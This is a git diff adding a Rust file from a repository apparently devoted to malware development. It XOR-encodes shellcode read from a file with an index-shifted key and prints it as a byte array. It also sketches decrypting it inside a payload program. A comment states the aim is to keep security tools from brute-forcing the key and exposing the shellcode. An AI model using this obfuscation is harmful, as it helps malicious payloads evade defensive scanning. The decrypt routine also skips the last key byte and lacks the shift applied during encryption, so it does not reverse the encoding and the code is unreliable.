|
| 1 | +/* |
| 2 | +For codes. Visit: https://github.com/Whitecat18/Rust-for-Malware-Development.git |
| 3 | +@5mukx |
| 4 | +*/ |
| 5 | + |
| 6 | +use std::fs::File; |
| 7 | +use std::io::Read; |
| 8 | + |
| 9 | + |
| 10 | +/* |
| 11 | +Default XOR Method |
| 12 | +*/ |
| 13 | + |
| 14 | +// fn xor(data: &[u8], key: &str) -> Vec<u8>{ |
| 15 | +// let key_bytes = key.as_bytes(); |
| 16 | +// let mut output = Vec::with_capacity(data.len()); |
| 17 | + |
| 18 | +// for (i, &byte) in data.iter().enumerate(){ |
| 19 | +// let current_key = key_bytes[i % key_bytes.len()]; |
| 20 | +// output.push(byte ^ (current_key)); |
| 21 | +// } |
| 22 | +// output |
| 23 | +// } |
| 24 | + |
| 25 | + |
| 26 | +/* / |
| 27 | +-----> |
| 28 | +There are some tools and security solutions can brute force the key which will expose the decrypted shellcode we can make i |
| 29 | +to be an part of the key. with keyspace much larger now, it's more difficult to brute force the key. |
| 30 | +-----> |
| 31 | +
|
| 32 | +/ */ |
| 33 | + |
| 34 | +fn xor(data: &[u8], key: &str) -> Vec<u8>{ |
| 35 | + let key_bytes = key.as_bytes(); |
| 36 | + let mut output = Vec::with_capacity(data.len()); |
| 37 | + |
| 38 | + for (i, &byte) in data.iter().enumerate(){ |
| 39 | + let current_key = key_bytes[i % key_bytes.len()]; |
| 40 | + output.push(byte ^ current_key.wrapping_add(i as u8)); |
| 41 | + } |
| 42 | + output |
| 43 | +} |
| 44 | + |
| 45 | +fn xor_encrypt(data: &[u8], key: &str)-> String{ |
| 46 | + let ciphertext = xor(data, key); |
| 47 | + let hex_str: Vec<String> = ciphertext.iter().map(|&x| format!("{:02x}",x)).collect(); |
| 48 | + format!("{{ 0x{} }};", hex_str.join(", 0x")) |
| 49 | +} |
| 50 | + |
| 51 | +// XOR DECRYPT FUNCTION |
| 52 | +fn xor_decrypt(data:&mut [u8], key: &[u8]){ |
| 53 | + let mut j = 0; |
| 54 | + for i in 0..data.len(){ |
| 55 | + if j == key.len() -1{ |
| 56 | + j = 0; |
| 57 | + } |
| 58 | + data[i] ^= key[j]; |
| 59 | + j += 1; |
| 60 | + } |
| 61 | +} |
| 62 | + |
| 63 | + |
| 64 | +fn main(){ |
| 65 | + |
| 66 | + let mut plaintext = Vec::new(); |
| 67 | + |
| 68 | + //keys |
| 69 | + let secrect_key = "iamafuckingnerd"; |
| 70 | + |
| 71 | + |
| 72 | + if let Ok(mut file) = File::open("./shellcode.bin"){ |
| 73 | + if let Ok(_) = file.read_to_end(&mut plaintext){ |
| 74 | + let ciphertext = xor_encrypt(&plaintext, secrect_key); |
| 75 | + println!("{}",ciphertext); |
| 76 | + } else { |
| 77 | + eprintln!("Failed to Read File !"); |
| 78 | + } |
| 79 | + } else { |
| 80 | + eprintln!("Failed to open File !"); |
| 81 | + } |
| 82 | + |
| 83 | + |
| 84 | + // Just an normat Implementation of shellcode on your Payload program ! |
| 85 | + // set your payload and pass the keys and shellcode |
| 86 | + //-----> |
| 87 | + |
| 88 | + // Shellcode decrypt methods ..! |
| 89 | + let mut shellcode = []; |
| 90 | + let secrect_key = "iamafuckingnerd"; |
| 91 | + xor_decrypt(&mut shellcode, secrect_key.as_bytes()); |
| 92 | + |
| 93 | + // After that your logic what to do with the shellcode !... |
| 94 | + |
| 95 | + //-----> |
| 96 | +} |
0 commit comments